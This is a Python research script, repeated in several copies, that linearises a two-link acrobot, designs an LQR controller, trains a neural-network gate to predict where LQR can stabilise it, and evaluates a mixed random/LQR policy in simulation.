num_trials / 2))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i, :] = samples[i, :]
Y[i] = sum(rews) > env.num_steps * 3 - 10
th1_min = 0
th1_max = 2 * pi
th2_min = -pi
th2_max = pi
th1dot_min = -10
th1dot_max = 10
th2dot_min = -30
th2dot_max = 30
samples = np.random.random_sample((int(num_trials / 2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2), int(num_trials))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i + int(num_trials / 2), :] = samples[i, :]
Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5
print(time.time() - start)
<|reserved_special_token_0|>
net = MLP(4, 1, 2, 32)
Y0 = np.ones((num_trials, 1), dtype=np.float32)
w = 0.01
class_weight = torch.tensor(Y.shape[0] / sum(Y) * w, dtype=torch.float32)
loss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.
BCEWithLogitsLoss(pos_weight=class_weight))
plt.close()
plt.plot(loss_hist)
plt.show()
n_thdot = 1
n_th = 1000
th1_vals = np.linspace(0, 2 * pi, n_th)
th2_vals = np.linspace(-pi, pi, n_th)
th1dot_vals = np.linspace(-10, 10, n_th)
th2dot_vals = np.linspace(-30, 30, n_th)
sig = torch.nn.Sigmoid()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
<|reserved_special_token_0|>
start = time.time()
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
x, y = np.meshgrid(th1_vals, th2_vals)
z = preds
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('Theta')
ax.set_xlabel('Th1')
ax.set_ylabel('Th2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
start = time.time()
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
x, y = np.meshgrid(th1dot_vals, th2dot_vals)
z = preds
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('DTheta')
ax.set_xlabel('dth1')
ax.set_ylabel('dth2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
torch.set_default_dtype(torch.float32)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
return reward, False
def do_rollout(trial_num):
np.random.seed(trial_num)
act_hold = 20
hold_count = 0
obs = env.reset()
local_lqr = False
actions = np.random.randn(1) * 3
local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])
)
local_reward_hist = np.zeros((env.num_steps, 1))
local_gate_hist = np.zeros((env.num_steps, 1))
local_action_hist = np.zeros((env.num_steps, 1))
for i in range(env.num_steps):
obs = np.array(obs, dtype=np.float32)
if sig(net(obs)) > 0.85:
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque
)
local_lqr = True
local_gate_hist[i] = 1
else:
local_gate_hist[i] = 0
if hold_count == act_hold:
actions = np.random.randn(1) * 3
hold_count = 0
hold_count += 1
obs, reward, done, _ = env.step(actions)
local_action_hist[i, :] = np.copy(actions)
local_state_hist[i, :] = np.copy(obs)
local_reward_hist[i, :] = np.copy(reward)
return (local_action_hist, local_state_hist, local_reward_hist,
local_gate_hist, local_lqr)
config = {'init_state': [-pi / 2, 0, 0, 0], 'max_torque': max_torque,
'init_state_weights': [1, 1, 5, 5], 'dt': dt, 'm2': m2, 'm1': m1, 'l1':
l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2, 'integrator':
integrator, 'reward_fn': reward_fn, 'act_hold': 1, 'max_t': 10}
env = gym.make('su_acrobot-v0', **config)
num_trials = 1000
action_hist = np.zeros((num_trials, env.num_steps, 1))
state_hist = np.zeros((num_trials, env.num_steps, env.observation_space.
shape[0]))
reward_hist = np.zeros((num_trials, env.num_steps, 1))
gate_hist = np.zeros((num_trials, env.num_steps, 1))
err_hist = np.zeros((num_trials, 1))
lqr_list = []
success_list = []
act_hold = 20
hold_count = 0
obs = env.reset()
start = time.time()
pool = Pool()
for i, res in enumerate(pool.imap(do_rollout, range(num_trials))):
acts, obs, rews, gate, lqr_on = res
action_hist[i, :, :] = acts
state_hist[i, :, :] = obs
reward_hist[i, :, :] = rews
gate_hist[i, :, :] = gate
err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0,
0, 0])) ** 2))
if lqr_on:
lqr_list.append(i)
if err_hist[i] < 2:
success_list.append(i)
print(len(lqr_list))
print(len(success_list))
print((time.time() - global_start) / 60)
<|reserved_special_token_1|>
import numpy as np
from numpy import sin, cos, pi
import gym
import seagul.envs
from seagul.integration import rk4, euler
from control import lqr, ctrb
from torch.multiprocessing import Pool
import matplotlib.pyplot as plt
import matplotlib
import time
global_start = time.time()
m1 = 1
m2 = 1
l1 = 1
l2 = 2
lc1 = 0.5
lc2 = 1
I1 = 0.083
I2 = 0.33
g = 9.8
dt = 0.01
max_torque = 25
integrator = euler
Q = np.identity(4)
Q[0, 0] = 1
Q[1, 1] = 1
Q[2, 2] = 1
Q[3, 3] = 1
R = np.identity(2) * 0.01
eval_max_t = 10
th1 = pi / 2
th2 = 0
th1d = 0
th2d = 0
TAU = np.array([[0], [1]])
m11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)
) + I1 + I2
m22 = m2 * lc2 ** 2 + I2
m12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2
M = np.array([[m11, m12], [m12, m22]])
h1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2
) * th2d * th1d
h2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2
H = np.array([[h1], [h2]])
phi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)
phi2 = m2 * lc2 * g * cos(th1 + th2)
PHI = np.array([[phi1], [phi2]])
Bl = np.linalg.inv(M) @ TAU
Blin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])
DPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-
m2 * lc2 * g, -m2 * lc2 * g]])
Al = -np.linalg.inv(M) @ DPHI
Alin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [
Al[1, 0], Al[1, 1], 0, 0]])
Ctr = ctrb(Alin, Blin)
assert np.linalg.matrix_rank(Ctr) == 4
K, S, E = lqr(Alin, Blin, Q, R)
k = np.array(K[1, :])
print(k)
def control(q):
gs = np.array([pi / 2, 0, 0, 0])
return -k.dot(q - gs)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
done = reward < 2
return reward, done
def do_rollout(args):
x, trial_num = args
th1, th2, dth1, dth2 = x
np.random.seed(trial_num)
local_reward_hist = np.ones((env.num_steps, 1)) * -1
obs = env.reset(init_vec=[th1, th2, dth1, dth2])
for i in range(env.num_steps):
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
obs, reward, done, _ = env.step(actions)
local_reward_hist[i, :] = np.copy(reward)
if done:
break
return local_reward_hist, i
start = time.time()
config = {'init_state': [0, 0, 0, 0], 'max_torque': max_torque,
'init_state_weights': [0, 0, 0, 0], 'max_t': 2.5, 'dt': dt, 'm2': m2,
'm1': m1, 'l1': l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2,
'integrator': integrator, 'reward_fn': reward_fn, 'act_hold': 1}
env = gym.make('su_acrobot-v0', **config)
num_trials = 200000
reward_hist = np.zeros((num_trials, env.num_steps, 1))
X = np.zeros((num_trials, 4), dtype=np.float32)
Y = np.zeros((num_trials, 1), dtype=np.float32)
th1_min = pi / 2 - 0.5
th1_max = pi / 2 + 0.5
th2_min = -1
th2_max = 1
th1dot_min = -5
th1dot_max = 5
th2dot_min = -10
th2dot_max = 10
samples = np.random.random_sample((int(num_trials / 2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
pool = Pool()
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i, :] = samples[i, :]
Y[i] = sum(rews) > env.num_steps * 3 - 10
th1_min = 0
th1_max = 2 * pi
th2_min = -pi
th2_max = pi
th1dot_min = -10
th1dot_max = 10
th2dot_min = -30
th2dot_max = 30
samples = np.random.random_sample((int(num_trials / 2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2), int(num_trials))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i + int(num_trials / 2), :] = samples[i, :]
Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5
print(time.time() - start)
from seagul.nn import MLP, fit_model
import torch
net = MLP(4, 1, 2, 32)
Y0 = np.ones((num_trials, 1), dtype=np.float32)
w = 0.01
class_weight = torch.tensor(Y.shape[0] / sum(Y) * w, dtype=torch.float32)
loss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.
BCEWithLogitsLoss(pos_weight=class_weight))
plt.close()
plt.plot(loss_hist)
plt.show()
n_thdot = 1
n_th = 1000
th1_vals = np.linspace(0, 2 * pi, n_th)
th2_vals = np.linspace(-pi, pi, n_th)
th1dot_vals = np.linspace(-10, 10, n_th)
th2dot_vals = np.linspace(-30, 30, n_th)
sig = torch.nn.Sigmoid()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
from itertools import product
start = time.time()
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
x, y = np.meshgrid(th1_vals, th2_vals)
z = preds
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('Theta')
ax.set_xlabel('Th1')
ax.set_ylabel('Th2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
start = time.time()
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
x, y = np.meshgrid(th1dot_vals, th2dot_vals)
z = preds
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('DTheta')
ax.set_xlabel('dth1')
ax.set_ylabel('dth2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
torch.set_default_dtype(torch.float32)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
return reward, False
def do_rollout(trial_num):
np.random.seed(trial_num)
act_hold = 20
hold_count = 0
obs = env.reset()
local_lqr = False
actions = np.random.randn(1) * 3
local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])
)
local_reward_hist = np.zeros((env.num_steps, 1))
local_gate_hist = np.zeros((env.num_steps, 1))
local_action_hist = np.zeros((env.num_steps, 1))
for i in range(env.num_steps):
obs = np.array(obs, dtype=np.float32)
if sig(net(obs)) > 0.85:
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque
)
local_lqr = True
local_gate_hist[i] = 1
else:
local_gate_hist[i] = 0
if hold_count == act_hold:
actions = np.random.randn(1) * 3
hold_count = 0
hold_count += 1
obs, reward, done, _ = env.step(actions)
local_action_hist[i, :] = np.copy(actions)
local_state_hist[i, :] = np.copy(obs)
local_reward_hist[i, :] = np.copy(reward)
return (local_action_hist, local_state_hist, local_reward_hist,
local_gate_hist, local_lqr)
config = {'init_state': [-pi / 2, 0, 0, 0], 'max_torque': max_torque,
'init_state_weights': [1, 1, 5, 5], 'dt': dt, 'm2': m2, 'm1': m1, 'l1':
l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2, 'integrator':
integrator, 'reward_fn': reward_fn, 'act_hold': 1, 'max_t': 10}
env = gym.make('su_acrobot-v0', **config)
num_trials = 1000
action_hist = np.zeros((num_trials, env.num_steps, 1))
state_hist = np.zeros((num_trials, env.num_steps, env.observation_space.
shape[0]))
reward_hist = np.zeros((num_trials, env.num_steps, 1))
gate_hist = np.zeros((num_trials, env.num_steps, 1))
err_hist = np.zeros((num_trials, 1))
lqr_list = []
success_list = []
act_hold = 20
hold_count = 0
obs = env.reset()
start = time.time()
pool = Pool()
for i, res in enumerate(pool.imap(do_rollout, range(num_trials))):
acts, obs, rews, gate, lqr_on = res
action_hist[i, :, :] = acts
state_hist[i, :, :] = obs
reward_hist[i, :, :] = rews
gate_hist[i, :, :] = gate
err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0,
0, 0])) ** 2))
if lqr_on:
lqr_list.append(i)
if err_hist[i] < 2:
success_list.append(i)
print(len(lqr_list))
print(len(success_list))
print((time.time() - global_start) / 60)
<|reserved_special_token_1|>
# %%
import numpy as np
from numpy import sin, cos, pi
import gym
import seagul.envs
from seagul.integration import rk4,euler
from control import lqr, ctrb
from torch.multiprocessing import Pool
import matplotlib.pyplot as plt
import matplotlib
#matplotlib.use('Qt5Agg')
import time
global_start = time.time()
# %%
# Acrobot physical parameters: link masses, lengths, centers of mass, and
# moments of inertia.  Shared by the gym env configs and the hand-derived
# linearization below.
m1 = 1
m2 = 1
l1 = 1
l2 = 2
lc1 = .5
lc2 = 1
I1 = .083
I2 = .33
g = 9.8
#
# Alternate parameter set (kept for reference):
# m1 = 1
# m2 = 1
# l1 = 1
# l2 = 1
# lc1 = .5
# lc2 = .5
# I1 = .2
# I2 = 1.0
# g = 9.8
dt = .01
max_torque = 25
integrator = euler
# LQR weights: identity state cost, small control cost.
Q = np.identity(4)
Q[0, 0] = 1
Q[1, 1] = 1
Q[2, 2] = 1
Q[3, 3] = 1
#
# Q = np.array([[1000, -500, 0,0],[-500, 1000, 0, 0],[0, 0, 1000, -500],[0,0,-500,1000]])
R = np.identity(2) * .01
eval_max_t = 10
# Linearization point: first link upright (th1 = pi/2), second link aligned,
# zero velocities -- the same goal state used by control() below.
th1 = pi / 2
th2 = 0
th1d = 0
th2d = 0
# Only the second (elbow) joint is actuated.
TAU = np.array([[0], [1]])
# Two-link manipulator-equation terms M(q), H(q, qdot), PHI(q), evaluated at
# the linearization point.
m11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)) + I1 + I2
m22 = m2 * lc2 ** 2 + I2
m12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2
M = np.array([[m11, m12], [m12, m22]])
h1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2) * th2d * th1d
h2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2
H = np.array([[h1], [h2]])
phi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)
phi2 = m2 * lc2 * g * cos(th1 + th2)
PHI = np.array([[phi1], [phi2]])
# Continuous-time linearization xdot = Alin x + Blin u about the upright state.
Bl = np.linalg.inv(M) @ TAU
Blin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])
# NOTE(review): DPHI appears to be the gravity-term Jacobian d(PHI)/dq at the
# upright configuration -- confirm against the derivation.
DPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-m2 * lc2 * g, -m2 * lc2 * g]])
Al = -np.linalg.inv(M) @ DPHI
Alin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [Al[1, 0], Al[1, 1], 0, 0]])
# Sanity-check controllability before solving the Riccati equation.
Ctr = ctrb(Alin, Blin)
assert np.linalg.matrix_rank(Ctr) == 4
K, S, E = lqr(Alin, Blin, Q, R)
# Keep only the gain row for the actuated (second) joint.
k = np.array(K[1, :])
print(k)
def control(q):
    """LQR full-state feedback about the upright goal state.

    Parameters
    ----------
    q : array-like, shape (4,)
        Current state ``[th1, th2, dth1, dth2]``.

    Returns
    -------
    float
        Elbow torque ``-k @ (q - goal)`` using the module-level gain ``k``.
    """
    goal = np.array([pi / 2, 0, 0, 0])
    return -np.dot(k, q - goal)
def reward_fn(s, a):
    """Tip-height reward; terminate once it drops below 2.

    With l1 = 1 and l2 = 2 the quantity sin(th1) + 2*sin(th1 + th2) is the
    end-effector height, maximized (= 3) at the upright state.

    Parameters
    ----------
    s : array-like
        State; only ``s[0]`` (th1) and ``s[1]`` (th2) are used.
    a : object
        Action (ignored).

    Returns
    -------
    tuple
        ``(reward, done)`` where ``done`` is True once reward < 2.
    """
    th1, th2 = s[0], s[1]
    height = np.sin(th1) + 2 * np.sin(th1 + th2)
    return height, height < 2
def do_rollout(args):
    """Roll out one episode under pure LQR feedback from a chosen start state.

    Parameters
    ----------
    args : tuple
        ``(x, trial_num)`` where ``x`` holds the initial state
        ``(th1, th2, dth1, dth2)`` and ``trial_num`` seeds numpy's RNG so
        parallel workers stay reproducible.

    Returns
    -------
    tuple
        ``(reward_hist, i)``: per-step rewards shaped ``(env.num_steps, 1)``
        (steps never reached keep the sentinel -1) and the index of the
        last step executed before termination.
    """
    init_state, seed = args
    np.random.seed(seed)
    # Sentinel -1 marks steps that were never reached before termination.
    reward_trace = -np.ones((env.num_steps, 1))
    obs = env.reset(init_vec=list(init_state))
    for step in range(env.num_steps):
        torque = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
        obs, reward, done, _ = env.step(torque)
        reward_trace[step, :] = np.copy(reward)
        if done:
            break
    return reward_trace, step
# %%b
# Build a supervised dataset: from which start states can the pure LQR policy
# keep the acrobot balanced?  Each sampled state is rolled out under LQR and
# labeled by whether the episode collected near-maximal reward.
start = time.time()
# init_state here is only a placeholder -- do_rollout overrides it through
# env.reset(init_vec=...) with each sampled start state.
config = {"init_state": [0, 0, 0, 0],
          "max_torque": max_torque,
          "init_state_weights": [0, 0, 0, 0],
          "max_t" : 2.5,
          "dt": dt,
          "m2": m2,
          "m1": m1,
          "l1": l1,
          "lc1": lc1,
          "lc2": lc2,
          "i1": I1,
          "i2": I2,
          "integrator" : integrator,
          "reward_fn": reward_fn,
          "act_hold": 1
          }
env = gym.make('su_acrobot-v0', **config)
num_trials = 200000
reward_hist = np.zeros((num_trials, env.num_steps, 1))
# X: sampled start states; Y: binary "LQR stabilized it" labels.
X = np.zeros((num_trials, 4), dtype=np.float32)
Y = np.zeros((num_trials, 1), dtype=np.float32)
# First half of the dataset: sample tightly around the upright state.
th1_min = pi / 2 - .5
th1_max = pi / 2 + .5
th2_min = -1
th2_max = 1
th1dot_min = -5
th1dot_max = 5
th2dot_min = -10
th2dot_max = 10
samples = np.random.random_sample((int(num_trials/2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min - th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
pool = Pool()  # defaults to number of available CPU's
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(num_trials/2))))):
    rews, steps = res
    reward_hist[i, :, :] = rews
    total_steps += steps
    X[i, :] = samples[i, :]
    # Positive label when the return is within 10 of the maximum possible
    # (reward_fn tops out at 3 per step).
    Y[i] = sum(rews) > env.num_steps*3 - 10
# Second half: sample broadly over the whole state space (mostly negatives).
th1_min = 0
th1_max = 2*pi
th2_min = -pi
th2_max = pi
th1dot_min = -10
th1dot_max = 10
th2dot_min = -30
th2dot_max = 30
samples = np.random.random_sample((int(num_trials/2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min - th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(num_trials/2), int(num_trials))))):
    rews, steps = res
    reward_hist[i, :, :] = rews
    total_steps += steps
    X[i+int(num_trials/2), :] = samples[i, :]
    # NOTE(review): this half uses a tighter threshold (-5) than the first
    # half (-10) -- confirm the asymmetry is intended.
    Y[i+int(num_trials/2)] = sum(rews) > env.num_steps*3 - 5
print(time.time() - start)
# %%
from seagul.nn import MLP, fit_model
import torch
# Gate network: 4 state inputs -> 1 logit, 2 hidden layers of 32 units.
net = MLP(4, 1, 2, 32)  # output_activation=torch.nn.Softmax)
Y0 = np.ones((num_trials, 1), dtype=np.float32)
# pos_weight heuristic N/num_pos scaled by w.  NOTE(review): w = 1e-2 shrinks
# the positive-class weight rather than boosting it -- confirm intended.
w = 1e-2
class_weight = torch.tensor(Y.shape[0]/sum(Y)*w, dtype=torch.float32)
loss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss(pos_weight=class_weight))
#loss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss())
# loss_hist = fit_model(net, X, Y, 100, batch_size=2048)
# loss_hist = fit_model(net, X, Y0, 5, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss(pos_weight=class_weight))
plt.close()
plt.plot(loss_hist)
plt.show()
# %%
# Visualize the learned gate as two 2-D slices of the 4-D state space.
n_thdot = 1
n_th = 1000
th1_vals = np.linspace(0, 2*pi, n_th)
th2_vals = np.linspace(-pi, pi, n_th)
th1dot_vals = np.linspace(-10, 10, n_th)
th2dot_vals = np.linspace(-30, 30, n_th)
sig = torch.nn.Sigmoid()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
from itertools import product
start = time.time()
# Slice 1: vary (th1, th2) with both velocities fixed at zero.
for i, j in product(range(n_th), range(n_th)):
    coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
# generate 2 2d grids for the x & y bounds
x, y = np.meshgrid(th1_vals, th2_vals)
z = preds
# x and y are bounds, so z should be the value *inside* those bounds.
# Therefore, remove the last value from the z array.
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('Theta')
ax.set_xlabel('Th1')
ax.set_ylabel('Th2')
# set the limits of the plot to the limits of the data
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
start = time.time()
# Slice 2: vary (th1dot, th2dot) with the angles pinned at the upright goal.
for i, j in product(range(n_th), range(n_th)):
    coords[j, i, :] = np.array([pi/2, 0, th1dot_vals[i], th2dot_vals[j]])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
# generate 2 2d grids for the x & y bounds
x, y = np.meshgrid(th1dot_vals, th2dot_vals)
z = preds
# x and y are bounds, so z should be the value *inside* those bounds.
# Therefore, remove the last value from the z array.
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('DTheta')
ax.set_xlabel('dth1')
ax.set_ylabel('dth2')
# set the limits of the plot to the limits of the data
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
# %%
torch.set_default_dtype(torch.float32)
def reward_fn(s, a):
    """Tip-height reward ``sin(th1) + 2*sin(th1 + th2)``; never terminates.

    Unlike the earlier shaping variant, the done flag is the constant
    False, so episodes always run to the env's time limit.
    """
    th1, th2 = s[0], s[1]
    return np.sin(th1) + 2 * np.sin(th1 + th2), False
def do_rollout(trial_num):
    """Roll out one mixed exploration/LQR episode.

    Random torques (each held for act_hold steps) drive the acrobot until
    the gate network `net` is confident (sigmoid > .85) that the current
    state can be stabilized, at which point the LQR controller supplies
    the action for that step.  `trial_num` seeds numpy's RNG so parallel
    workers are reproducible.

    Returns (action_hist, state_hist, reward_hist, gate_hist, lqr_on):
    per-step logs plus a flag saying whether the gate ever fired.
    """
    np.random.seed(trial_num)
    act_hold = 20  # resample the random torque every 20 steps
    hold_count = 0
    obs = env.reset()
    local_lqr = False
    actions = np.random.randn(1) * 3
    local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0]))
    local_reward_hist = np.zeros((env.num_steps, 1))
    local_gate_hist = np.zeros((env.num_steps, 1))
    local_action_hist = np.zeros((env.num_steps, 1))
    for i in range(env.num_steps):
        obs = np.array(obs, dtype=np.float32)
        if sig(net(obs)) > .85:
            # Gate says the state is stabilizable: hand control to LQR.
            actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
            local_lqr = True
            local_gate_hist[i] = 1
        else:
            local_gate_hist[i] = 0
        # NOTE(review): the hold logic runs every step, so when hold_count
        # reaches act_hold it overwrites even a freshly computed LQR action
        # with a new random torque -- confirm this is intended.
        if hold_count == act_hold:
            actions = np.random.randn(1) * 3
            hold_count = 0
        hold_count += 1
        obs, reward, done, _ = env.step(actions)
        local_action_hist[i, :] = np.copy(actions)
        local_state_hist[i, :] = np.copy(obs)
        local_reward_hist[i, :] = np.copy(reward)
    return local_action_hist, local_state_hist, local_reward_hist, local_gate_hist, local_lqr
# Evaluate the combined policy (random exploration until the gate hands
# control to LQR) over long 10 s episodes from randomized start states.
config = {"init_state": [-pi / 2, 0, 0, 0],
          "max_torque": max_torque,
          "init_state_weights": [1, 1, 5, 5],
          "dt": dt,
          "m2": m2,
          "m1": m1,
          "l1": l1,
          "lc1": lc1,
          "lc2": lc2,
          "i1": I1,
          "i2": I2,
          "integrator" : integrator,
          "reward_fn": reward_fn,
          "act_hold": 1,
          "max_t" : 10
          }
env = gym.make('su_acrobot-v0', **config)
num_trials = 1000
# Per-trial logs: actions, states, rewards, gate decisions, final-state error.
action_hist = np.zeros((num_trials, env.num_steps, 1))
state_hist = np.zeros((num_trials, env.num_steps, env.observation_space.shape[0]))
reward_hist = np.zeros((num_trials, env.num_steps, 1))
gate_hist = np.zeros((num_trials, env.num_steps, 1))
err_hist = np.zeros((num_trials, 1))
lqr_list = []  # trials where the gate engaged LQR at least once
success_list = []  # trials whose final state ended within 2 of the goal
act_hold = 20
hold_count = 0
obs = env.reset()
start = time.time()
pool = Pool()  # defaults to number of available CPU's
for i, res in enumerate(pool.imap(do_rollout,range(num_trials))):
    acts, obs, rews, gate, lqr_on = res
    action_hist[i, :, :] = acts
    state_hist[i, :, :] = obs
    reward_hist[i, :, :] = rews
    gate_hist[i, :, :] = gate
    # Euclidean distance of the final state from the upright goal [pi/2, 0, 0, 0].
    err_hist[i] = (np.sqrt(sum(((state_hist[i, -1, :] - np.array([pi / 2, 0, 0, 0])) ** 2))))
    if lqr_on:
        lqr_list.append(i)
    #print(err_hist[i])
    #print(reward_hist[i,-1])
    if err_hist[i] < 2:
        success_list.append(i)
#
# Serial fallback (kept for debugging without the worker pool):
# for i in (range(num_trials)):
#     res = do_rollout(i)
#     acts, obs, rews, gate, lqr_on = res
#     action_hist[i, :, :] = acts
#     state_hist[i, :, :] = obs
#     reward_hist[i, :, :] = rews
#     gate_hist[i, :, :] = gate
#     err_hist[i] = (np.sqrt(sum(((state_hist[i, -1, :] - np.array([pi / 2, 0, 0, 0])) ** 2))))
#     if lqr_on:
#         lqr_list.append(i)
#     #print(err_hist[i])
#     #print(reward_hist[i,-1])
#     if err_hist[i] < 2:
#         success_list.append(i)
print(len(lqr_list))
print(len(success_list))
print((time.time() - global_start) / 60)
|
flexible
|
{
"blob_id": "358d4573ff386d6874d5bb5decfe71c71141bf1c",
"index": 2525,
